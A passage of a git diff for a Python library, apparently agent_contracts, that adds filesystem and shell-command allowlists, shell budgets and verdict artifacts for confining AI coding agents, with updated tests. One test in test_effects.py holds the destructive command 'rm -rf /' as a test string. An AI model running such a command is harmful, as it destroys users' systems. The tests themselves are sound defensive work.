}, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. 
Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." 
} } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." 
} } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." 
+ } + } } } } diff --git a/src/agent_contracts/types.py b/src/agent_contracts/types.py index 5120ead..5b35b1d 100644 --- a/src/agent_contracts/types.py +++ b/src/agent_contracts/types.py @@ -45,6 +45,21 @@ class PostconditionDef: # --- Tier 1: Enforceable --- +@dataclass(frozen=True) +class FilesystemAuthorization: + """Authorized repo-local filesystem scopes for coding/build agents.""" + + read: List[str] = field(default_factory=list) + write: List[str] = field(default_factory=list) + + +@dataclass(frozen=True) +class ShellAuthorization: + """Authorized shell command patterns for coding/build agents.""" + + commands: List[str] = field(default_factory=list) + + @dataclass(frozen=True) class EffectsAuthorized: """Capability scope — what the agent MAY do (default: deny all). @@ -55,6 +70,8 @@ class EffectsAuthorized: tools: List[str] = field(default_factory=list) network: List[str] = field(default_factory=list) state_writes: List[str] = field(default_factory=list) + filesystem: Optional[FilesystemAuthorization] = None + shell: Optional[ShellAuthorization] = None @dataclass(frozen=True) @@ -65,6 +82,7 @@ class ResourceBudgets: max_tokens: Optional[int] = None max_tool_calls: Optional[int] = None max_duration_seconds: Optional[float] = None + max_shell_commands: Optional[int] = None @dataclass(frozen=True) @@ -161,6 +179,7 @@ class ObservabilityConfig: traces: Optional[TracesConfig] = None metrics: List[MetricDef] = field(default_factory=list) violation_events: Optional[ViolationEventsConfig] = None + run_artifact_path: Optional[str] = None @dataclass(frozen=True) @@ -243,5 +262,8 @@ class Contract: versioning: Optional[VersioningConfig] = None slo: Optional[SLOConfig] = None + # Runtime metadata + source_path: Optional[str] = field(default=None, repr=False) + # Raw data (preserves x- extensions and unknown fields) raw: Optional[Dict[str, Any]] = field(default=None, repr=False) diff --git a/tests/conftest.py b/tests/conftest.py index 4490c09..cf84610 100644 --- 
a/tests/conftest.py +++ b/tests/conftest.py @@ -14,16 +14,13 @@ def tmp_yaml(tmp_path: Path): """Factory fixture — write a dict as YAML and return the path.""" def _write(data: Dict[str, Any], name: str = "contract.yaml") -> Path: - p = tmp_path / name - p.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / name + path.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") + return path return _write -# ---- Canonical contract data for each tier ---- - - @pytest.fixture def tier0_data() -> Dict[str, Any]: """Minimal Tier 0 contract (4 fields).""" @@ -40,7 +37,7 @@ def tier0_data() -> Dict[str, Any]: @pytest.fixture def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 1 contract with schemas, effects, and budgets.""" + """Tier 1 contract with coding/build authorization surfaces.""" return { **tier0_data, "inputs": {"schema": {"type": "object", "properties": {"query": {"type": "string"}}}}, @@ -50,6 +47,11 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "tools": ["search", "database.read"], "network": ["https://api.example.com/*"], "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**", "tests/**"], + }, + "shell": {"commands": ["python -m pytest *", "python -m ruff check *"]}, } }, "resources": { @@ -58,6 +60,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "max_tokens": 10000, "max_tool_calls": 20, "max_duration_seconds": 30.0, + "max_shell_commands": 5, } }, } @@ -65,7 +68,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: @pytest.fixture def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 2 contract with all composable fields.""" + """Tier 2 contract with composable fields and verdict artifact path.""" return { **tier1_data, "effects": { @@ -97,6 +100,7 @@ def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: {"name": "latency_ms", "type": "histogram"}, ], 
"violation_events": {"emit": True, "destination": "otel"}, + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json", }, "versioning": { "build_id": "sha256:abc123", diff --git a/tests/test_budgets.py b/tests/test_budgets.py index 2b20d43..0492e2a 100644 --- a/tests/test_budgets.py +++ b/tests/test_budgets.py @@ -3,6 +3,7 @@ from __future__ import annotations import threading +import time import pytest @@ -18,52 +19,54 @@ def test_no_config_allows_all(self) -> None: tracker.add_tokens(1_000_000) for _ in range(1000): tracker.record_tool_call() - tracker.check_all() # Should not raise + tracker.record_shell_command() + tracker.check_all() def test_cost_limit(self) -> None: - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00)) tracker.add_cost(0.50) tracker.add_cost(0.40) with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.add_cost(0.20) def test_token_limit(self) -> None: - budgets = ResourceBudgets(max_tokens=1000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tokens=1000)) tracker.add_tokens(800) with pytest.raises(BudgetExceededError, match="tokens"): tracker.add_tokens(300) def test_tool_call_limit(self) -> None: - budgets = ResourceBudgets(max_tool_calls=3) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=3)) tracker.record_tool_call() tracker.record_tool_call() tracker.record_tool_call() with pytest.raises(BudgetExceededError, match="tool_calls"): tracker.record_tool_call() - def test_duration_limit(self) -> None: - budgets = ResourceBudgets(max_duration_seconds=0.01) - tracker = BudgetTracker(budgets) - import time + def test_shell_command_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_shell_commands=1)) + tracker.record_shell_command() + with pytest.raises(BudgetExceededError, match="shell_commands"): + tracker.record_shell_command() + def 
test_duration_limit(self) -> None: + tracker = BudgetTracker(ResourceBudgets(max_duration_seconds=0.01)) time.sleep(0.02) with pytest.raises(BudgetExceededError, match="duration_seconds"): tracker.check_duration() def test_snapshot(self) -> None: - budgets = ResourceBudgets(max_cost_usd=10.0) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=10.0)) tracker.add_cost(1.50) tracker.add_tokens(500) tracker.record_tool_call() - snap = tracker.snapshot() - assert snap.cost_usd == 1.50 - assert snap.tokens == 500 - assert snap.tool_calls == 1 - assert snap.elapsed_seconds >= 0 + tracker.record_shell_command() + snapshot = tracker.snapshot() + assert snapshot.cost_usd == 1.50 + assert snapshot.tokens == 500 + assert snapshot.tool_calls == 1 + assert snapshot.shell_commands == 1 + assert snapshot.elapsed_seconds >= 0 def test_cost_callback(self) -> None: cost_value = [0.0] @@ -71,37 +74,34 @@ def test_cost_callback(self) -> None: def get_cost() -> float: return cost_value[0] - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets, cost_callback=get_cost) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00), cost_callback=get_cost) cost_value[0] = 0.50 - tracker.check_all() # OK + tracker.check_all() cost_value[0] = 1.50 with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.check_all() def test_reset(self) -> None: - budgets = ResourceBudgets(max_tool_calls=5) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=5, max_shell_commands=5)) for _ in range(4): tracker.record_tool_call() + tracker.record_shell_command() tracker.reset() - snap = tracker.snapshot() - assert snap.tool_calls == 0 - assert snap.cost_usd == 0.0 + snapshot = tracker.snapshot() + assert snapshot.tool_calls == 0 + assert snapshot.shell_commands == 0 + assert snapshot.cost_usd == 0.0 def test_negative_cost_rejected(self) -> None: - tracker = BudgetTracker() with 
pytest.raises(ValueError, match="non-negative"): - tracker.add_cost(-1.0) + BudgetTracker().add_cost(-1.0) def test_negative_tokens_rejected(self) -> None: - tracker = BudgetTracker() with pytest.raises(ValueError, match="non-negative"): - tracker.add_tokens(-1) + BudgetTracker().add_tokens(-1) def test_thread_safety(self) -> None: - budgets = ResourceBudgets(max_tool_calls=10_000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=10_000)) errors: list = [] def call_many() -> None: @@ -112,13 +112,13 @@ def call_many() -> None: errors.append(True) threads = [threading.Thread(target=call_many) for _ in range(5)] - for t in threads: - t.start() - for t in threads: - t.join() + for thread in threads: + thread.start() + for thread in threads: + thread.join() - snap = tracker.snapshot() - assert snap.tool_calls == 5000 + assert not errors + assert tracker.snapshot().tool_calls == 5000 def test_budget_exceeded_error_fields(self) -> None: err = BudgetExceededError("cost_usd", 5.23, 5.00) diff --git a/tests/test_cli.py b/tests/test_cli.py index fda48bf..67338e9 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any, Dict @@ -13,112 +14,122 @@ @pytest.fixture -def runner(): +def runner() -> CliRunner: return CliRunner() @pytest.fixture def contract_file(tmp_path: Path, tier1_data: Dict[str, Any]) -> Path: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / "contract.yaml" + path.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") + return path class TestValidate: - def test_valid_contract(self, runner, contract_file) -> None: + def test_valid_contract(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file)]) assert result.exit_code == 0 assert "PASSED" in 
result.output + assert "Coding/build surfaces" in result.output - def test_valid_contract_json(self, runner, contract_file) -> None: + def test_valid_contract_json(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file), "--json-output"]) assert result.exit_code == 0 - import json data = json.loads(result.output) assert data["valid"] is True assert data["tier"] == 1 + assert data["coding_surfaces"]["filesystem_write"] == ["src/**", "tests/**"] - def test_invalid_contract(self, runner, tmp_path) -> None: + def test_invalid_contract(self, runner: CliRunner, tmp_path: Path) -> None: bad = tmp_path / "bad.yaml" bad.write_text(yaml.dump({"agent_contract": "bad"}, sort_keys=False), encoding="utf-8") result = runner.invoke(main, ["validate", str(bad)]) assert result.exit_code == 1 assert "FAILED" in result.output - def test_file_not_found(self, runner) -> None: - result = runner.invoke(main, ["validate", "/nonexistent.yaml"]) - assert result.exit_code != 0 - - def test_shows_recommendations(self, runner, tmp_path, tier0_data) -> None: - p = tmp_path / "tier0.yaml" - p.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") - result = runner.invoke(main, ["validate", str(p)]) + def test_shows_recommendations(self, runner: CliRunner, tmp_path: Path, tier0_data: Dict[str, Any]) -> None: + path = tmp_path / "tier0.yaml" + path.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") + result = runner.invoke(main, ["validate", str(path)]) assert result.exit_code == 0 assert "Recommendations" in result.output class TestCheckCompat: - def test_compatible(self, runner, contract_file) -> None: + def test_compatible(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file)]) assert result.exit_code == 0 - def test_json_output(self, runner, contract_file) -> None: + def test_json_output(self, runner: CliRunner, 
contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file), "-j"]) assert result.exit_code == 0 - import json - data = json.loads(result.output) - assert "compatible" in data + assert "compatible" in json.loads(result.output) class TestInit: - def test_template_generation(self, runner) -> None: + def test_template_generation(self, runner: CliRunner) -> None: result = runner.invoke(main, ["init", "--name", "test-agent"]) assert result.exit_code == 0 assert "test-agent" in result.output assert "postconditions" in result.output - def test_output_to_file(self, runner, tmp_path) -> None: + def test_coding_template_generation(self, runner: CliRunner) -> None: + result = runner.invoke(main, ["init", "--template", "coding"]) + assert result.exit_code == 0 + assert "filesystem:" in result.output + assert "run_artifact_path" in result.output + + def test_output_to_file(self, runner: CliRunner, tmp_path: Path) -> None: out = tmp_path / "generated.yaml" result = runner.invoke(main, ["init", "--name", "test", "-o", str(out)]) assert result.exit_code == 0 assert out.exists() - def test_from_trace(self, runner, tmp_path) -> None: + def test_from_trace(self, runner: CliRunner, tmp_path: Path) -> None: trace_file = tmp_path / "traces.jsonl" traces = [ - {"agent": {"name": "trace-agent", "version": "1.0.0"}, - "tool_calls": [{"name": "search"}, {"name": "database.read"}], - "usage": {"cost_usd": 0.05, "total_tokens": 500}, - "duration_seconds": 2.5}, + { + "agent": {"name": "trace-agent", "version": "1.0.0"}, + "tool_calls": [{"name": "search"}, {"name": "database.read"}], + "shell_commands": ["python -m pytest tests/test_app.py"], + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "usage": {"cost_usd": 0.05, "total_tokens": 500}, + "duration_seconds": 2.5, + }, ] - trace_file.write_text( - "\n".join(__import__("json").dumps(t) for t in traces), - encoding="utf-8", - ) + 
trace_file.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") result = runner.invoke(main, ["init", "--from-trace", str(trace_file)]) assert result.exit_code == 0 assert "trace-agent" in result.output - assert "search" in result.output + assert "filesystem" in result.output + assert "shell" in result.output + + +class TestCheckVerdict: + def test_pass(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "pass", "final_gate": "allowed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 0 + assert "Outcome: pass" in result.output + + def test_fail(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "fail", "final_gate": "failed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 1 class TestTestCommand: - def test_no_eval_suite(self, runner, contract_file) -> None: + def test_no_eval_suite(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["test", str(contract_file)]) assert result.exit_code == 0 assert "Postconditions" in result.output - def test_with_eval_suite(self, runner, contract_file, tmp_path) -> None: + def test_with_eval_suite(self, runner: CliRunner, contract_file: Path, tmp_path: Path) -> None: eval_dir = tmp_path / "evals" eval_dir.mkdir() eval_file = eval_dir / "basic.jsonl" - import json - cases = [ - {"output": {"status": "ok"}}, - {"output": None}, - ] - eval_file.write_text( - "\n".join(json.dumps(c) for c in cases), encoding="utf-8" - ) + eval_file.write_text("\n".join(json.dumps(c) for c in [{"output": {"status": "ok"}}, {"output": None}]), encoding="utf-8") result = runner.invoke(main, ["test", str(contract_file), "--eval-suite", str(eval_dir)]) - # At least one should pass (non-None 
output), one may fail assert "Results:" in result.output diff --git a/tests/test_composition.py b/tests/test_composition.py index a4c13d5..21821d0 100644 --- a/tests/test_composition.py +++ b/tests/test_composition.py @@ -20,7 +20,7 @@ def test_compatible_contracts(self, tmp_yaml, tier2_data: Dict[str, Any]) -> Non "authorized": {"tools": ["search"], "network": [], "state_writes": []}, "declared": {"tools": ["search"], "network": [], "state_writes": []}, }, - "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0}}, + "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0, "max_shell_commands": 3}}, "delegation": { "max_depth": 1, "allowed_agents": [], diff --git a/tests/test_effects.py b/tests/test_effects.py index 3a18848..672a9fa 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -11,60 +11,70 @@ union_declared, validate_declared_subset, ) -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class TestEffectGuard: def test_no_config_allows_all(self) -> None: guard = EffectGuard() assert guard.check_tool("anything") is True + assert guard.check_file_read("secret.txt") is True + assert guard.check_shell_command("rm -rf /") is True assert not guard.is_configured def test_configured_allows_listed_tool(self) -> None: - auth = EffectsAuthorized(tools=["search", "database.read"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search", "database.read"])) assert guard.check_tool("search") is True assert guard.check_tool("database.read") is True def test_configured_denies_unlisted_tool(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) assert 
guard.check_tool("delete_all") is False def test_glob_pattern_matching(self) -> None: - auth = EffectsAuthorized(tools=["database.*", "api.user.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["database.*", "api.user.*"])) assert guard.check_tool("database.read") is True assert guard.check_tool("database.write") is True assert guard.check_tool("api.user.get") is True assert guard.check_tool("api.admin.delete") is False def test_require_tool_raises(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) with pytest.raises(EffectDeniedError, match="tool 'delete'"): guard.require_tool("delete") - def test_require_tool_passes(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) - guard.require_tool("search") # Should not raise - def test_network_check(self) -> None: - auth = EffectsAuthorized(network=["https://api.example.com/*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(network=["https://api.example.com/*"])) assert guard.check_network("https://api.example.com/search") is True assert guard.check_network("https://evil.com/data") is False def test_state_write_check(self) -> None: - auth = EffectsAuthorized(state_writes=["tickets.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(state_writes=["tickets.*"])) assert guard.check_state_write("tickets.status") is True assert guard.check_state_write("users.password") is False + def test_filesystem_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"])) + ) + assert guard.check_file_read("src/main.py") is True + assert guard.check_file_write("src/main.py") is True + assert guard.check_file_write("tests/test_main.py") is False + + def test_shell_command_checks(self) -> None: + guard = EffectGuard( + 
EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command("python -m pytest tests/test_app.py") is True + assert guard.check_shell_command("python -m mypy src") is False + def test_empty_allowlist_denies_all(self) -> None: - auth = EffectsAuthorized(tools=[], network=[], state_writes=[]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False assert guard.is_configured @@ -85,34 +95,38 @@ def test_glob_intersection(self) -> None: assert "database.write" in result.tools assert "admin.delete" not in result.tools - def test_empty_parent_denies_all(self) -> None: - parent = EffectsAuthorized(tools=[]) - child = EffectsAuthorized(tools=["search", "read"]) + def test_filesystem_and_shell_intersection(self) -> None: + parent = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"]), + shell=ShellAuthorization(commands=["python -m pytest *", "python -m ruff check *"]), + ) + child = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**", "tests/**"], write=["tests/**"]), + shell=ShellAuthorization(commands=["python -m pytest tests/*", "python -m mypy *"]), + ) result = intersect_authorized(parent, child) - assert result.tools == [] + assert result.filesystem is not None + assert result.filesystem.read == ["src/**"] + assert result.filesystem.write == [] + assert result.shell is not None + assert result.shell.commands == ["python -m pytest tests/*"] class TestUnionDeclared: def test_basic_union(self) -> None: - a = EffectsDeclared(tools=["search"], network=["https://a.com"]) - b = EffectsDeclared(tools=["write"], network=["https://b.com"]) - result = union_declared(a, b) + result = union_declared( + EffectsDeclared(tools=["search"], network=["https://a.com"]), + EffectsDeclared(tools=["write"], network=["https://b.com"]), + ) assert set(result.tools) == {"search", 
"write"} assert set(result.network) == {"https://a.com", "https://b.com"} - def test_deduplication(self) -> None: - a = EffectsDeclared(tools=["search", "read"]) - b = EffectsDeclared(tools=["search", "write"]) - result = union_declared(a, b) - assert result.tools == ["search", "read", "write"] - class TestValidateDeclaredSubset: def test_valid_subset(self) -> None: declared = EffectsDeclared(tools=["search"]) authorized = EffectsAuthorized(tools=["search", "database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] + assert validate_declared_subset(declared, authorized) == [] def test_invalid_tool(self) -> None: declared = EffectsDeclared(tools=["search", "delete_all"]) @@ -120,9 +134,3 @@ def test_invalid_tool(self) -> None: violations = validate_declared_subset(declared, authorized) assert len(violations) == 1 assert "delete_all" in violations[0] - - def test_glob_matching(self) -> None: - declared = EffectsDeclared(tools=["database.read"]) - authorized = EffectsAuthorized(tools=["database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] diff --git a/tests/test_enforcer.py b/tests/test_enforcer.py index a707893..1c45a0e 100644 --- a/tests/test_enforcer.py +++ b/tests/test_enforcer.py @@ -2,96 +2,160 @@ from __future__ import annotations +import json +from pathlib import Path from typing import Any, Dict import pytest -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + enforce_contract, + load_verdict_artifact, +) from agent_contracts.loader import load_contract +from agent_contracts.postconditions import PostconditionError @pytest.fixture def enforcer_tier1(tmp_yaml, tier1_data: Dict[str, Any]): - """ContractEnforcer with a Tier 1 contract.""" - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) 
return ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) +@pytest.fixture +def coding_contract_data() -> Dict[str, Any]: + return { + "agent_contract": "0.1.0", + "identity": {"name": "repo-build-agent", "version": "0.1.0"}, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + "effects": { + "authorized": { + "tools": [], + "network": [], + "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**"], + }, + "shell": {"commands": ["python -m pytest *"]}, + } + }, + "resources": {"budgets": {"max_shell_commands": 1}}, + "observability": {"run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json"}, + } + + class TestContractEnforcer: def test_authorized_tool_passes(self, enforcer_tier1) -> None: - enforcer_tier1.check_tool_call("search") # In allowlist + enforcer_tier1.check_tool_call("search") def test_unauthorized_tool_raises(self, enforcer_tier1) -> None: with pytest.raises(ContractViolation, match="not authorized"): enforcer_tier1.check_tool_call("delete_everything") - def test_tool_call_budget(self, tmp_yaml, tier1_data) -> None: - tier1_data["resources"]["budgets"]["max_tool_calls"] = 2 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("search") - enforcer.check_tool_call("database.read") - with pytest.raises(ContractViolation, match="tool_calls"): - enforcer.check_tool_call("search") + def test_file_write_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract_path = tmp_yaml(coding_contract_data) + contract = load_contract(contract_path) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with 
pytest.raises(ContractViolation, match="File write"): + enforcer.check_file_write("tests/test_app.py") + verdict = enforcer.finalize_run() + assert verdict.outcome == "blocked" + assert Path(verdict.artifacts["verdict_path"]).exists() + loaded = load_verdict_artifact(verdict.artifacts["verdict_path"]) + assert loaded["outcome"] == "blocked" + + def test_shell_command_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="Shell command"): + enforcer.check_shell_command("python -m mypy src") + assert enforcer.finalize_run().outcome == "blocked" + + def test_shell_command_budget(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.check_shell_command("python -m pytest tests/test_app.py") + with pytest.raises(ContractViolation, match="shell_commands"): + enforcer.check_shell_command("python -m pytest tests/test_other.py") + + def test_fail_verdict_when_required_checks_fail(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "fail", exit_code=1) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "fail" + assert verdict.final_gate == "failed" + assert any(v["violated_clause"] == "contract.postconditions.repo_checks_green" for v in verdict.violations) + + def test_pass_verdict_writes_artifact(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", 
